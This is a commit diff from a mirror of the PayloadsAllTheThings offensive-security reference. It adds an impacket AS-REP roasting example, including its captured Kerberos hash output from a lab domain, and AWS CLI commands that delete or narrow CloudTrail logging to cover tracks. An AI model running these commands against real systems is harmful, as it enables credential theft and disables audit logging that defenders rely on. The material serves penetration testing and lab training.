mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
CloudTrail disable, GraphQL tool
This commit is contained in:
parent
d489597357
commit
95ab07b45e
@ -24,6 +24,7 @@
|
||||
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
|
||||
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
|
||||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
|
||||
## Exploit
|
||||
|
||||
|
@ -771,6 +771,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||
Using `impacket` to get the hash and `hashcat` to crack it.
|
||||
|
||||
```powershell
|
||||
# example
|
||||
$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
|
||||
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||
|
||||
[*] Getting TGT for svc-alfresco
|
||||
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4
|
||||
|
||||
# extract hashes
|
||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
||||
|
@ -474,6 +474,25 @@ Prerequisite:
|
||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||
|
||||
|
||||
## Disable CloudTrail
|
||||
|
||||
```powershell
|
||||
$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
|
||||
```
|
||||
|
||||
Disable monitoring of events from global services
|
||||
|
||||
```powershell
|
||||
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
|
||||
```
|
||||
|
||||
Disable Cloud Trail on specific regions
|
||||
|
||||
```powershell
|
||||
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
|
||||
```
|
||||
|
||||
|
||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||
|
||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||
|
Loading…
Reference in New Issue
Block a user